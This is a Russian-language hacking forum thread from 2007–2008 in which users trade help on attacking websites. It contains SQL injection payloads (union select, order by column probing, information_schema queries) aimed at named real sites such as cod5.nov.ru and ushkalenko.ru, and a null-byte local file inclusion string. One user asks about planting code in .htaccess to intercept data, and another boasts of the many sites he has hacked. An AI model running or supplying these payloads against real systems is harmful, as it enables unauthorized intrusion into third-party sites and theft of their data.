Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. Octave_Parango

    Joined:
    6 Nov 2008
    Messages:
    83
    Likes Received:
    11
    Reputations:
    -1
    Такой вопрос.
    Есть скуля 4-ка.
    Ели удачно сбрутить название таблиц и столбцов, но нет полей для вывода, каким образом можно вывести инфу?
     
  2. Fuckel

    Fuckel Banned

    Joined:
    16 Jan 2008
    Messages:
    274
    Likes Received:
    59
    Reputations:
    6
    читаем мануалы http://forum.antichat.ru/threadnav43966-1-10.html делай поиск по фразе "3.ЧТО ДЕЛАТЬ ЕСЛИ ОТСУТСТВУЮТ ВЫВОДИМЫЕ ПОЛЯ."
     
  3. krypt3r

    krypt3r Elder - Старейшина

    Joined:
    27 Apr 2007
    Messages:
    1,507
    Likes Received:
    389
    Reputations:
    101
    Возможно ли проведение атаки, если на запросы
    http://site.com/index.php?page=2
    и
    http://site.com/index.php?page%00bgg=2
    выдается один и тот же результат? Как вообще реализуются "атаки на имя переменной"?
     
  4. Ershik

    Ershik Elder - Старейшина

    Joined:
    7 Nov 2007
    Messages:
    301
    Likes Received:
    46
    Reputations:
    6
    Работает ли php код в файлах .htpasswd и .htaccess?
    Можно ли встроить туда свой код, чтобы перехватывались данные и сохранялись отдельным файлом?
    Права на запись есть.
     
  5. sabe

    sabe Elder - Старейшина

    Joined:
    16 Mar 2007
    Messages:
    313
    Likes Received:
    178
    Reputations:
    14
    krypt3r
    бред.. тот же самый результ изза ?
    инклуд будет когда:
    http://site.com/index.php?page=views&id=2
    тогда:
    http://site.com/index.php?page=..index.php%00&id=2

    Octave_Parango
    есть прога сипт.. качаеш мега словяк и вперед брутить..
     
    #3945 sabe, 2 Dec 2008
    Last edited: 2 Dec 2008
  6. BanQui

    BanQui Elder - Старейшина

    Joined:
    10 Jul 2008
    Messages:
    68
    Likes Received:
    18
    Reputations:
    -11
    Такой вопрос! Если есть сайт и на нем присутствует локальный инклуд! Как можно его раскрутить если на сайт загрузить ничего нельзя(ну по крайней мере такой функции нет в меню на сайта)!? Может есть какие-то пути? Или это просто нашел да и х*р с ним!?
     
  7. Ghost0ff

    Ghost0ff New Member

    Joined:
    18 Nov 2008
    Messages:
    28
    Likes Received:
    4
    Reputations:
    0
    пробуй +order+by+5000000 --
    либо без плюсов, просто пробелы. Либо +group+by+1 -- и т.д.
     
  8. geforse

    geforse Elder - Старейшина

    Joined:
    2 Mar 2008
    Messages:
    617
    Likes Received:
    290
    Reputations:
    1
    вобщем вот: http://cod5.nov.ru/serverstats.php?serverid=1+union+select+1,2,3,4--
    а если вести http://cod5.nov.ru/serverstats.php?serverid=1+union+select+1,2,3,4/* , то уже совсем другое вылазиет)

    полей вроде 4

    +group+by+1 вроде ошибок нет)

    что дальше делать ?)))
     
  9. BanQui

    BanQui Elder - Старейшина

    Joined:
    10 Jul 2008
    Messages:
    68
    Likes Received:
    18
    Reputations:
    -11
    http://cod5.nov.ru/serverstats.php?serverid=1+order+by+4-- - почувствуй разницу вот http://cod5.nov.ru/serverstats.php?serverid=1+order+by+5-- ???? НУ как??? А то хрень, что написал "Ghost0ff" все БРЕЕЕЕЕДДДД!!! Все делается Э Л Е М Е Н Т А Р Н О ! Можно и без group by !! Главное правильно поставить ' и - ! Практический все сайты которые я взломал, поддавались вот на такое http://site/index.php?page=-1+order+by+x
    Нужно перед 1 поставить - ! Ну это обычно в твоем случае ничего ставить ненадо! Насчет поста "geforse" ты знаешь скорей самое простое это вообще ничего не ставить после "4" ))) Воть так http://cod5.nov.ru/serverstats.php?serverid=1+union+select+1,2,3,4 - удачи))
     
  10. Grey

    Grey Banned

    Joined:
    10 Jun 2006
    Messages:
    1,047
    Likes Received:
    1,315
    Reputations:
    1,159
    И зачем так нужно делать? Особенно если учесть что это не правильно.
    Так нужно делать только потому что ты не знаком с синтаксисом SQL?
     
    #3950 Grey, 2 Dec 2008
    Last edited: 2 Dec 2008
  11. BanQui

    BanQui Elder - Старейшина

    Joined:
    10 Jul 2008
    Messages:
    68
    Likes Received:
    18
    Reputations:
    -11
    Хммм в большенстве случаев этот вариант прокатывает!!!
     
  12. BanQui

    BanQui Elder - Старейшина

    Joined:
    10 Jul 2008
    Messages:
    68
    Likes Received:
    18
    Reputations:
    -11
    Скул инж. я еще хоть как нить знаю но вот с PHP может кто нибуть поможет???
     
  13. -m0rgan-

    -m0rgan- Elder - Старейшина

    Joined:
    29 Sep 2008
    Messages:
    514
    Likes Received:
    170
    Reputations:
    17
    Почитай здесь:
    http://forum.antichat.ru/thread12123.html
     
    #3953 -m0rgan-, 2 Dec 2008
    Last edited: 2 Dec 2008
  14. BanQui

    BanQui Elder - Старейшина

    Joined:
    10 Jul 2008
    Messages:
    68
    Likes Received:
    18
    Reputations:
    -11
    Да с синтаксис SQL я знаю неоч! Но факт остается фактом! Этот вариант прокатывает во многих случаях!!!
     
  15. Grey

    Grey Banned

    Joined:
    10 Jun 2006
    Messages:
    1,047
    Likes Received:
    1,315
    Reputations:
    1,159
    Гениально! Главное сказать и не важно что не правильно.
    Оператор order by сортирует результат запроса, а отсортировывать пустой результат (а со значением -1 другого и не будет) - не самая лучшая идея.
    Использовать order by нужно только при существующих значениях.

    Ошибка в данном случае была в использование /* - в новых версиях мускула нельзя не закрывать этот комментарий, а значит теперь обходимся комментариями '#' и '-- '.
     
    2 people like this.
  16. geforse

    geforse Elder - Старейшина

    Joined:
    2 Mar 2008
    Messages:
    617
    Likes Received:
    290
    Reputations:
    1
    Чего опять ему надо ?((

    http://cod5.nov.ru/serverstats.php?serverid=1+union+select+1,version(),3,4--
    (безрезультатно()

    serverstats.php?serverid=1+union+select+1,column_name,3,4+from+information_schema.columns.--
    тоже /=

    serverstats.php?serverid=1+union+select+1,column_name,3,4+from+information_schema.columns.+limit+1,1--

    даже версию не посмотреть(
     
  17. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,750
    Likes Received:
    1,044
    Reputations:
    339
    mysql error: The used SELECT statements have a different number of columns

    читай:) Сначала кол-во колонок подбери
     
  18. BanQui

    BanQui Elder - Старейшина

    Joined:
    10 Jul 2008
    Messages:
    68
    Likes Received:
    18
    Reputations:
    -11
    Блин на мой вопрос с ПХП кто нибуть ответит??? Если кто не видел вот он :
    ------------------------------------
    Я там не понял как именно добавлять файл! Читал раз 5!!! Как китайский блин!!!
     
  19. sabe

    sabe Elder - Старейшина

    Joined:
    16 Mar 2007
    Messages:
    313
    Likes Received:
    178
    Reputations:
    14
    geforse
    помоему 2 и 3 принтабельные.. но вывода не увидел, логический вывод:

    5 ветка..
    с правами
     
  20. Sanic1977

    Sanic1977 Banned

    Joined:
    29 Oct 2008
    Messages:
    98
    Likes Received:
    6
    Reputations:
    0
    как раскрутить?

    http://www.ushkalenko.ru/guestbook/index.php?mz_module=guestbook&mz_page=-1
     
Thread Status:
Not open for further replies.